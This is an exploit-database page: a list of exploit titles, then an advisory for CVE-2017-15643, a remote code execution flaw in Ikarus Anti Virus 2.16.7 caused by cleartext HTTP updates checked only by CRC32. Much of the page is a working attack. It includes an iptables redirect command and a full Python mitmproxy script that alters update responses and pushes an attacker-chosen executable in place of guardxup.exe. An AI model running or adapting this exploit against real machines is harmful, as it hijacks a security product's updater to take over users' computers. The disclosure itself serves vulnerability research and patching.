e630f8c249
45 changes to exploits/shellcodes Cisco ASA - Crash PoC Cisco ASA - Crash (PoC) GNU binutils 2.26.1 - Integer Overflow (POC) GNU binutils 2.26.1 - Integer Overflow (PoC) K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read Linux Kernel - 'AF_PACKET' Use-After-Free Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2) Microsoft Edge Chakra JIT - Memory Corruption Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion Microsoft Edge Chakra JIT - 'LdThis' Type Confusion Pdfium - Pattern Shading Integer Overflows Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow Hotspot Shield - Information Disclosure Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation Nitro Pro PDF - Multiple Vulnerabilities Odoo CRM 10.0 - Code Execution Dashlane - DLL Hijacking LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation Trustwave SWG 11.8.0.27 - SSH Unauthorized Access Ichano AtHome IP Cameras - Multiple Vulnerabilities Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution Ikraus Anti Virus 2.16.7 - Remote Code Execution McAfee Security Scan Plus - Remote Command Execution OrientDB - Code Execution 360 Total Security - Local Privilege Escalation HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution iBall WRA150N - Multiple Vulnerabilities GitStack - Unauthenticated Remote Code Execution Monstra CMS - Remote Code Execution Ametys CMS 4.0.2 - Unauthenticated Password Reset DblTek - Multiple Vulnerabilities FiberHome - Directory Traversal PHP Melody 2.7.3 - Multiple Vulnerabilities Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure Horde Groupware 5.2.21 - Unauthorized File Download QNAP HelpDesk < 1.1.12 - SQL Injection Hanbanggaoke IP Camera - Arbitrary Password Change McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution Sophos XG Firewall 16.05.4 MR-4 - Path Traversal Cisco DPC3928 Router - Arbitrary File Disclosure IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities Geneko Routers - Unauthenticated Path Traversal Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
8.3 KiB
8.3 KiB
Vulnerability summary
The following advisory describes an remote code execution found in Ikraus Anti Virus version 2.16.7.
KARUS anti.virus “secures your personal data and PC from all kinds of malware. Additionally, the Anti-SPAM module protects you from SPAM and malware from e-mails. Prevent intrusion and protect yourself against cyber-criminals by choosing IKARUS anti.virus, powered by the award-winning IKARUS scan.engine. It is among the best in the world, detecting new and existing threats every day. ”
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor Response
Update 1 CVE: CVE-2017-15643
The vendor has released patches to address these vulnerabilities.
For more information: https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001/
Vulnerability details
An active network attacker (MiTM) can achieve remote code execution on a machine that runs Ikraus Anti Virus.
Ikarus AV for windows uses cleartext HTTP for updates along with a CRC32 checksum and an update value for verification of the downloaded files.
Also ikarus checks for a update version number which can be incremented to goad the process to update.
The update process executable in ikarus called guardxup.exe
guardxup.exe, send over port 80, the following request for update:
GET /cgi-bin/virusutilities.pl?A=7534ED66&B=6.1.1.0.11.1.256.7601&C=1005047.2013019.2001016.98727&F=4.5.2%3bO=0%3bSP=0&E=WD-194390-VU HTTP/1.1
Accept: */*
User-Agent: virusutilities(6.1,0,1005047)
Host: updates.ikarus.at
Connection: close
The server will respond with:
HTTP/1.1 200 OK
Date: Sun, 23 Oct 2016 04:51:05 GMT
Server: Apache/2.4.10 (Debian) mod_perl/2.0.9dev Perl/v5.20.2
Content-Disposition: inline; filename=virusutilities
Content-Length: 306
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
<url>
full http://mirror04.ikarus.at/updates/
diff http://mirror06.ikarus.at/updates/
</url>
<up>
antispam_w64 001000076
antispam 001000076
update 001005047
virusutilities 002013019
t3modul_w64 002001016
t3modul 002001016
sdb 000007074
t3sigs 000098727
</up>
<dependence>
t3modul
</dependence>
Through the proxy we will modify the response and add 1 to the ‘update’ value and forward the response to the client.
Then the client will request the update via this url: http://mirror04.ikarus.at/updates/guardxup001005048.full
The ikarus server will respond with a 404:
HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Sun, 23 Oct 2016 04:53:05 GMT Content-Type: text/html Content-Length: 168 Connection: close
<html> <head></head>404 Not Found
nginx/1.6.2 </html> ```
But we will modify the response with a IKUP format:
Bytes: 0x0 - 0x3 == IKUP # header
Bytes: 0x4 - 0x7 == 0x0s
Bytes: 0x8 == 0x3C # pointer to start of PE EXE MZ header
Bytes: 0x20 - 0x23 == update value in little endian (script fixes it up)
Bytes: 0x24 - 0x27 == crc32 checksum (script populates from provided binary)
Bytes: 0x28 -> pointer to MZ header == 0x0s
Bytes: 'pointer to MZ header' -> ? == appended exe
Then we will forward to the update to the client, where it replaces guardxup.exe with our executable.
Proof of concept
Please install mitmproxy 0.17 – pip install mitmproxy==0.17
To use this script, you’ll need to MITM port 80 traffic from the client for use with a transparent proxy.
Set your firewall rules to intercept 80 traffic on port 8080:
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
and execute the script as follows:
./poc.py file_to_deploy.exe
#!/usr/bin/env python2
import os
try:
from mitmproxy import controller, proxy, platform
from mitmproxy.proxy.server import ProxyServer
except:
from libmproxy import controller, proxy, platform
from libmproxy.proxy.server import ProxyServer
import re
import struct
import sys
import zlib
import bz2
class IkarusPOC(controller.Master):
def __init__(self, server, backdoored_file):
controller.Master.__init__(self, server)
self.ikarus= {}
self.crc_file = 0
self.backdoored_file = backdoored_file
self.to_replace = 0
self.already_patched = 0
self.update_number = 0
def win_header(self):
self.update_header = "\x49\x4B\x55\x50\x00\x00\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00"
self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
self.update_header += struct.pack("<I", self.to_replace) # update number
self.update_header += struct.pack("<I", self.crc_file) # checksum
self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
self.update_header += "\x00\x00\x00\x00"
def run(self):
try:
return controller.Master.run(self)
except KeyboardInterrupt:
self.shutdown()
def crc_stream(self, a_string):
prev = 0
return zlib.crc32(a_string, prev) & 0xFFFFFFFF
def crc(self, some_file):
prev = 0
for eachLine in open(some_file,"rb"):
prev = zlib.crc32(eachLine, prev)
self.crc_file = prev & 0xFFFFFFFF
print "[*] crc_file", self.crc_file
def handle_request(self, flow):
hid = (flow.request.host, flow.request.port)
flow.reply()
def handle_response(self, flow):
print "[*] flow.request.host:", flow.request.host
if "cgi-bin/imsa-lite.pl" in flow.request.path and "Dalvik" in flow.request.headers['User-Agent'] and self.already_patched <=2:
content = flow.reply.obj.response.content
p = re.compile("antispam[\s|\t].*\n")
result = p.search(content)
the_result = result.group(0)
original_update_number= [int(s) for s in the_result.split() if s.isdigit()][0]
if self.update_number == 0:
self.update_number = original_update_number
self.to_replace = self.update_number + 1
content = content.replace(str(original_update_number), str(self.to_replace))
flow.reply.obj.response.content = content
if "cgi-bin/virusutilities.pl" in flow.request.path and 'virusutilities' in flow.request.headers['User-Agent'] and self.already_patched <= 2:
print "[*] Found update response, modifying..."
content = flow.reply.obj.response.content
p = re.compile("update[\s|\t].*\n")
result = p.search(content)
the_result = result.group(0)
original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]
if self.update_number == 0:
self.update_number = original_update_number
self.to_replace = self.update_number + 1
print '[*] Update_number', self.update_number
print '[*] Replace number', self.to_replace
content = content.replace(str(original_update_number), str(self.to_replace))
print "[*] Updated content", content
flow.reply.obj.response.content = content
if 'guard' in flow.request.path and 'full' in flow.request.path and self.already_patched <= 2:
print '[*] Found guardxup.exe request! Modifying request and pushing provided file!'
self.crc(self.backdoored_file)
self.win_header()
with open(self.backdoored_file, 'rb') as f:
file_out = f.read()
content = self.update_header + file_out
with open('/tmp/update_test.full', 'wb') as f:
f.write(content)
flow.reply.obj.response.content = content
flow.reply.obj.response.status_code = 200
self.already_patched += 1
flow.reply()
config = proxy.ProxyConfig(port=8080, mode='transparent')
server = ProxyServer(config)
m = IkarusPOC(server, sys.argv[1])
m.run()